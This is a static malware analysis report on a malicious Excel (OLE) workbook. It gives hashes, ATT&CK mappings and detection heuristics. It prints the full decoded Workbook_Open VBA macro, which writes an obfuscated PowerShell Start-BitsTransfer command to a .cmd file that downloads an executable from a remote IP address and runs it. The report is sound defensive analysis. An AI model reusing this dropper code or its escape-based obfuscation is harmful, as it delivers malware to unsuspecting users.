Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 122fd6ba7eaff699…

MALICIOUS

Office (OLE) / .XLS

Size: 168.0 KB | Created: 2021-04-13 13:37:17 | Authoring application: Microsoft Excel | First seen: 2021-10-23
MD5: f1a0dc40b455647ef7fa4e9b9c009469
SHA-1: 42621f4cd2ad7f0de4140ac63845b8826e6e978c
SHA-256: 122fd6ba7eaff6999bceced392b909939a14c82ef7a562d630772eaf33a6fbe9
Risk Score: 128

Malware Insights

MITRE ATT&CK
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1105 Ingress Tool Transfer
  • T1566.001 Phishing: Spearphishing Attachment

The Workbook_Open VBA macro stages a PowerShell command that downloads an executable from 'http://3.64.251.139/v11/1/TDH_71036210065IMG.exe', saves it as 'C:\Users\Public\Documents\minutesister.exe' and then runs the downloaded file. The staged command is written to 'C:\Users\Public\Documents\frontserve.cmd', and a GetObject call on the Shell.Application COM object is used to open (execute) that script. This indicates downloader/dropper functionality.

Heuristics 4

  • VBA macros detected (severity: medium; 3 related findings; rule OLE_VBA_MACROS)
    Document contains VBA macro code
  • VBA stages a PowerShell/LOLBin download-and-run command (severity: critical; rule OLE_VBA_BITSTRANSFER_DROPPER)
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it, either by writing it to a script file and running it or by launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. This is a high-confidence downloader/dropper indicator, stronger than the individual Shell / download keywords on their own.
    Matched line in script:
    Private Sub Workbook_Open()
  • GetObject call (severity: high; rule OLE_VBA_GETOBJ)
    GetObject call
    Matched line in script:
    GetObject("new:" & sheehe & "l.application").Open (andattack)
  • Workbook_Open macro (severity: low; rule OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script:
    Private Sub Workbook_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                                   | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source)      | 1282 bytes
SHA-256: b3abc6692fe42688fbbf515efa69602b6d99534534a0c5a4be0688d6094565f2
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
kidus = "pow^ers"
yourcost = "he^ll"
studenttrip = FreeFile
andattack = "C:\Users\Public\Documents\frontserve.cm" & Chr(CLng(97.5) + CLng(1.6))
Open andattack For Output As #studenttrip
Print #studenttrip, kidus & yourcost & " -w hi slee^p -Se 31;Start-BitsTrans^fer -Source htt`p://3.64.251.139/v11/1/TDH_71036210065IMG.e`xe" & " -Destination C:\Users\Public\Documents\minutesister.e`xe" & ";C:\Users\Public\Documents\minutesister.e`xe"
Close studenttrip
sheehe = "shel"
GetObject("new:" & sheehe & "l.application").Open (andattack)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub starbed()
'
' starbed Macro
' 1Y9EPHD78LD1
'
End Sub